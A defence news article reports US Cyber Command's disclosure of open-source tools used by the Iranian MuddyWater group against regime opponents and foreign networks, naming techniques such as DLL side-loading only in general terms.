Website Notifications

Get notifications in real-time for staying up to date with content that matters to you.

Iranian cyber threat exposed b US intelligence

Open-source tools deployed by Iranian cyber actors to monitor regime opponents have been identified.

Open-source tools deployed by Iranian cyber actors to monitor regime opponents have been identified.

The US Cyber Command’s Cyber National Mission Force has identified and disclosed multiple open-source tools leveraged by Iranian intelligence across networks around the world.


Referred to as ‘MuddyWater’ — a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS) — the actors primarily target Middle Eastern nations, but have more recently sought to undermine European and North American networks. 

According to the Congressional Research Service, the MOIS conducts domestic surveillance to identify regime opponents and surveil anti-regime activists abroad through a network of agents placed in Iran’s embassies.

The US Cyber Command has warned that the presence of multiple open-source tools on the same network could be an indicator of the presence of Iranian malicious cyber actors.

Specifically, methods employed by the state-sponsored actors include side-loading DLLs to trick legitimate programs into running malware, and obfuscating PowerShell scripts to hide command and control functions. 

Samples of the suite of tools and JavaScript files used by the malicious cyber actors are being posted to alert site Virus Total.


This latest announcement from US Cyber Command comes just months after multinational cyber agencies observed an Iranian government-sponsored APT group exploiting Microsoft Exchange vulnerabilities to undermine critical infrastructure.

Iranian government-sponsored APT actors have actively targeted a broad range of victims across both the public and private sector from within the US and in partner nations, including Australia.

The joint cyber security advisory followed a joint investigation among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC).

[Related: How will the Five Eyes combat cyber threats in 2022?]

Iranian cyber threat exposed b US intelligence
lawyersweekly logo

more from defence connect

Jan 20 2022
Beca enters strategic partnership with iDiC
The consultancy group has committed to facilitating the growth in work opportunities for the Indigenous community.  ...
Jan 20 2022
PODCAST: Training Australia's future warfighters, with Matthew Sibree, managing director IndoPac, defence & security at CAE
On this episode of the Defence Connect Podcast, host Phil Tarrant is joined by Matthew Sibree, managing director IndoPac, defence...
Jan 20 2022
Northrop Grumman demonstrates cross-domain tech integration
The prime has demonstrated its ability to integrate technology across domains for joint operations.   ...